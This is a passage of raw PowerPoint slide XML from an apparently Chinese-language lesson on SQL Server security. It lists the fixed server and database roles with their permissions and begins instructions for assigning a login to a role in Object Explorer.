                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>Sysadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以在服务器上执行任何活动。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1206211316"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371156">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Serveradmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>更改服务器范围的配置选项和关闭服务器</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2646415056"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Securityadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以管理登录名及其属性，还可以重置登录名和密码</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="650732126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>每个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>mssql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>用户都属于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>服务器角色。如果未向服务器主体授予或拒绝某个安全对象的特定权限，该用户将集成</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>角色的权限</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3027928508"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>processadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以终止在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>实例中运行的进程</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3635073126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>setupadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以添加和删除连接服务器</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1260628020"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>bulkadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以运行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>BULK INSERT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>语句</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="79599062"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Diskadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>用于管理磁盘文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2180262268"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>dbcreator</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以创建、更改、删除和还原任何数据库</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187606408"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30089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数据库角色</a:t>
            </a:r>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700808"/>
            <a:ext cx="3182144" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库角色是针对某个具体数据库的权限分配，数据库用户可以作为数据库角色的成员，继承数据库角色的权限，数据库管理人员也可以通过管理角色的权限来管理数据库用户的权限。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="表格 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE6FF06-25FE-46EB-9807-C1F236BD255E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887492552"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3935760" y="908720"/>
          <a:ext cx="8136904" cy="5485544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2071212">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3107792337"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6065692">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3339334475"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="301647">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>数据库角色名称</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>角色说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1017786181"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_owner</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以执行数据库的所有配置和维护活动、可以删除数据库。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1206211316"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371156">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_accessadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>登录名、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>windows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>组和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>登录名添加删除数据库的访问权限</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2646415056"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_Securityadmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以修改角色成员身份和管理权限</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="650732126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>每个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>mssql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>用户都属于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>服务器角色。如果未向服务器主体授予或拒绝某个安全对象的特定权限，该用户将集成</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>public</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>角色的权限</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3027928508"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_backupoperator</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以备份数据库</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3635073126"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_ddladmin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以在数据库中运行任何数据定义语言（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>ddl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>）命令</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1260628020"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_datawriter</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以添加、修改或删除数据库内用户表中的任何数据</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="79599062"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_datareader</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>可以读取数据库内用户表中的任何数据</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2180262268"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_denydatawriter</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>不能添加、修改或删除数据库内用户表中的任何数据</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="592171968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>Db_denydatareader</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>不能读取数据库内用户表中的任何数据</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187606408"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220644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账户登录指派到角色</a:t>
            </a:r>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700808"/>
            <a:ext cx="6278488" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>对象资源管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>窗口中，依次展开服务器节点下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>安全性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】➤【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>登录名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>节点。右击一个登录账户，在弹出的快捷菜单中选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>菜单命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选择窗口左侧列表中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
